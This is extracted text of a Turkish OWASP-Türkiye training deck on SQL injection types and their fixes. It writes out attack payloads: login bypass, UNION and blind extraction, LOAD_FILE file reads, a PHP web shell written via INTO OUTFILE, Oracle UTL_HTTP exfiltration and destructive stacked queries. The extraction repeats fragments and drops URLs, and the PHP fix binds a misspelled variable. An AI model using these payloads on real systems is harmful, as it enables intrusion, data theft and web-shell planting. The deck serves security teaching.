Her Yönüyle SQL Enjeksiyonu. OWASP-Türkiye Bünyamin Demir

Ebat: px

Şu sayfadan göstermeyi başlat:

Download "Her Yönüyle SQL Enjeksiyonu. OWASP-Türkiye Bünyamin Demir"

Coskun Sezer
8 yıl önce
İzleme sayısı:

1 Her Yönüyle SQL Enjeksiyonu OWASP-Türkiye Bünyamin Demir

2 Bünyamin Demir ) OWASP Türkiye Bölüm Lideri Founder & Enforsec Ltd. Sızma Testleri Uzmanı Web, Mobil, Network, SCADA, Wireless, Sosyal Mühendislik, ATM, DoS/DDoS ve Yük testi Kaynak kod analizi Eğitmen Web/Mobil Uygulama Güvenlik Denetimi Güvenli Kod Geliştirme Veritabanı Güvenliği 2

3 SQL Enjeksiyonu ' 3

4 SQL Enjeksiyonu uygulamalara, güvenilir olmayan kaynaklardan gelen girdilerin kontrol edilmeden SQL sorgusunu oluşturan cümlecik içerisinde kullanılmasından kaynaklanmaktadır. 4

5 Zafiyet Barındıran Örnek Uygulamalar Bana öğrencilerini getir. Bana 5A öğrencilerini getir. Bana 5A veya 5B öğrencilerini getir. 5

6 Zafiyet Barındıran Örnek Uygulamalar... String classname = request.getparameter("class"); String query = "SELECT * FROM students WHERE class = '" + classname + "'"; ResultSet rs = stmt.execute(query); string classname = class.text; string query = "SELECT * FROM students WHERE class = '" + classname + "'"; sda = new SqlDataAdapter(query, conn); DataTable dt = new DataTable(); sda.fill(dt); $classname = $_GET['class']; $query = "SELECT * FROM students WHERE class= '$classname'"; $result = mysql_query($query);... 6

execute(query);...... string classname = class.

7 SQL in Çalışması 7

8 SQL Enjeksiyonu Çeşitleri Genel SQL Enjeksiyonu Union Tabanlı (Union Based) SQL Enjeksiyonu Hata Tabanlı (Error Based) SQL Enjeksiyonu Kör (Blind) SQL Enjeksiyonu Zaman Tabanlı (Time Based) SQL Enjeksiyonu 8

Tabanlı (Error Based) SQL Enjeksiyonu Kör (Blind)

9 Genel SQL Enjeksiyonu SELECT name, lastname, no FROM student WHERE class= 1 9

10 Genel SQL Enjeksiyonu or '1'='1 SELECT name, lastname, no FROM student WHERE class= 1 or 1 = 1 10

11 Genel SQL Enjeksiyonu 11

12 UNION Tabanlı SQL Enjeksiyonu SELECT column1,column2 FROM table1 UNION SELECT column1,column2 FROM table2 UNION iki tabloyu birleştirir ve tüm kayıtlar tekil olacak şekilde listeler; SELECT column1,column2 FROM table1 UNION ALL SELECT column1,column2 FROM table2 UNION ALL ise iki tabloyu birleştirir ve tüm kayıtları tekil olmayacak şekilde (aynı kayıttan birden fazla görme ihtimaliniz var) listeler. 12

column1,column2 FROM table1 UNION ALL SELECT column1,column2 FROM table2 UNION ALL ise iki tabloyu

13 UNION Tabanlı SQLi - Tespiti Veritabanı MSSQL Oracle MySQL MS Access Hata Mesajı All queries combined using a UNION, INTERSECT or EXCEPT operator must have an equal number of expressions in their target lists. ORA-01789: query block has incorrect number of result columns. The used SELECT statements have a different number of columns. The number of columns in the two selected tables or queries of a union query do not match. 13

ORA-01789: query block has incorrect number of result columns.

14 UNION Tabanlı SQLi - ORDER SELECT * FROM kullanici ORDER BY 1 SELECT * FROM kullanici ORDER BY 2 Veritabanı Hata Mesajı MSSQL The ORDER BY position number NUM is out of range of the number of items in the select list. Oracle ORA-01785: ORDER BY item must be the number of a SELECT-list expression. MySQL Unknown column 'NUM' in 'order clause'. MS Access Microsoft Jet database engine does not recognize '4' as a valid field name or expression. 14

Oracle ORA-01785: ORDER BY item must be the number of a SELECT-list expression.

15 UNION Tabanlı SQLi - Tespiti 15

16 UNION Tabanlı SQLi - Tespiti UNION SELECT null,null,null,null,null-- 16

17 UNION Tabanlı SQLi - Tespiti UNION SELECT 1,2,'test',null,null-- 17

18 UNION Tabanlı SQLi - Tespiti UNION SELECT 1,2,@@version,null,null 18

19 Hata Tabanlı (Error Based) SQL Enjeksiyonu 19

20 Hata Tabanlı (Error Based) SQL Enjeksiyonu 20

21 Hata Tabanlı (Error Based) SQL Enjeksiyonu 21

22 Hata Tabanlı (Error Based) SQL Enjeksiyonu 22

23 Hata Tabanlı (Error Based) SQL Enjeksiyonu 23

24 Kör (Blind) SQL Enjeksiyonu SELECT * FROM friends WHERE fid=2 24

25 Kör (Blind) SQL Enjeksiyonu AND 1=1 SELECT * FROM friends WHERE fid=2 AND 1=1 AND 1=2 SELECT * FROM friends WHERE fid=2 AND 1=2 25

26 Kör (Blind) SQL Enjeksiyonu... $stmt = $mysqli->prepare("select F.*,U.* FROM users U INNER JOIN friends F ON (F.friend_id=U.user_id) WHERE F.friend_id=$this->friend_id AND F.user_id=? AND F.verify=1"); $stmt->bind_param('i',$this->user_id); $stmt->execute();... 26

27 Kör (Blind) SQL Enjeksiyonu İstismarı Sorgu Çıktı Yorum SELECT database() davshan Veritabanı ismi SELECT SUBSTRING((SELECT database()),1,1) d Veritabanı isminin ilk karakteri SELECT ASCII(SUBSTRING((SELECT database()),1,1)) 100 Veritabanı isminin ilk karakterinin ASCII değeri 27

28 Kör (Blind) SQL Enjeksiyonu İstismarı AND ASCII(SUBSTRING((SELECT database()),1,1))=97 28

29 Kör (Blind) SQL Enjeksiyonu İstismarı AND ASCII(SUBSTRING((SELECT database()),1,1))=98 AND ASCII(SUBSTRING((SELECT database()),1,1))=99 AND ASCII(SUBSTRING((SELECT database()),1,1))=100 29

30 Kör (Blind) SQL Enjeksiyonu İstismarı AND ASCII(SUBSTRING((SELECT database()),2,1))=97 30

31 Zaman Tabanlı (Time Based) SQL Enjeksiyonu 31

32 Farklı SQL İfadelerinde SQLi INSERT Cümleciği 35

33 Farklı SQL İfadelerinde SQLi INSERT Cümleciği 36

34 Farklı SQL İfadelerinde SQLi INSERT Cümleciği 37

35 Farklı SQL İfadelerinde SQLi UPDATE Cümleciği UPDATE CREDITCARD SET NAME=' +name+ ' WHERE USERID=1 a'-- UPDATE CREDITCARD SET NAME='a'-- WHERE USERID=1 38

36 Farklı SQL İfadelerinde SQLi DELETE Cümleciği DELETE FROM CREDITCARD WHERE USERID=1 AND CARDID="+cardid+" or 1=1 DELETE FROM CREDITCARD WHERE USERID=1 AND CARDID=29 or 1=1 39

37 İleri Seviye SQLi İşletim Sistemi 40

38 İleri Seviye SQLi İşletim Sistemi /friend_info.php?fid=2 and 1=2 UNION ALL SELECT 1,2,LOAD_FILE('c:/windows/win.ini'),3,4,5,6-- 41

39 İleri Seviye SQLi İşletim Sistemi and 1=2 UNION ALL SELECT 1,2,3,4,5,6,"<pre><?php passthru($_get['cmd'])?></pre>" INTO OUTFILE "C:/wamp/www/davshan/cmd.php"-- 42

40 İleri Seviye SQLi İşletim Sistemi 43

41 İleri Seviye SQLi Kanal Dışı SELECT UTL_HTTP.REQUEST(' FROM dual /product?pid=1 or 1=UTL_HTTP.REQUEST(' (select user from dual)) [07/Sep/2012:00:39: ] "GET /oracle/minishop HTTP/1.1" "-" 44

42 İleri Seviye SQLi İkinci Kademe abc;delete FROM teslimat-- 45

43 Fonksiyonaliteye SQLi ile Saldırı Login Sayfası public Users login (String username, String password) { Users user = new Users();... ResultSet rs = stmt.executequery("select * FROM users WHERE username='"+username+"' and password='"+password+"'"); while (rs.next()) { user = new Users(rs.getInt("userId"),UserType.USER,rs.getString("username")); }... return user; } 46

44 Fonksiyonaliteye SQLi ile Saldırı Login Sayfası SELECT * FROM users WHERE username='a' or '1'='1'--' and password='xx' 47

45 Fonksiyonaliteye SQLi ile Saldırı Login Sayfası SELECT * FROM users WHERE username='a' or '1'='1' and rownum=1--' and password='xx' 48

46 Fonksiyonaliteye SQLi ile Saldırı Login Sayfası SELECT , password FROM users WHERE = 'bunyamindemir@gmail.com' a';update users SET = 'saldirgan@abc.com' WHERE = bunyamindemir@gmail.com SELECT , password FROM users WHERE = 'a';update users SET = 'saldirgan@site.com' WHERE = 'bunyamindemir@gmail.com' 49

47 Fonksiyonaliteye SQLi ile Saldırı Login Sayfası SELECT , password FROM users WHERE = 'bunyamindemir@gmail.com' bedirhan@abc.com' UNION SELECT 'bunyamin@abc.com',password from users-- SELECT , password FROM users WHERE = 'bedirhan@abc.com' UNION SELECT 'bunyamin@abc.com', password from users 50

48 Sqlmap python sqlmap.py -u " -f --banner 51

49 SQLi Çözümü - Java... String classname = request.getparameter("class"); PreparedStatement psmt = conn.preparestatement("select * FROM students WHERE class=?"); psmt.setstring(1, classname); ResultSet rs = psmt.executequery();... 52

50 SQLi Çözümü ASP.NET... string classname = class.text; SqlCommand query = new SqlCommand("SELECT * FROM students WHERE class=@clsname", conn); query.parameters.addwithvalue("@clsname", classname); sda = new SqlDataAdapter(query); DataTable dt = new DataTable(); sda.fill(dt);... 53

51 SQLi Çözümü - PHP... $classname = $_GET['class']; $stmt = $mysqli->prepare("select * FROM students WHERE class=?"); $stmt->bind_param('s',$classnames); $stmt->execute();... 54

Benzer belgeler

MySqlConnection connection; MySqlCommand command; MySqlDataReader reader; MySqlDataAdapter adapter; DataTable table;

MySqlConnection connection; MySqlCommand command; MySqlDataReader reader; MySqlDataAdapter adapter; DataTable table; using System; using System.Data; using System.Collections.Generic; using System.Linq; using System.Text; using System.Windows.Forms; using MySql.Data; using MySql.Data.MySqlClient; namespace arac_servisi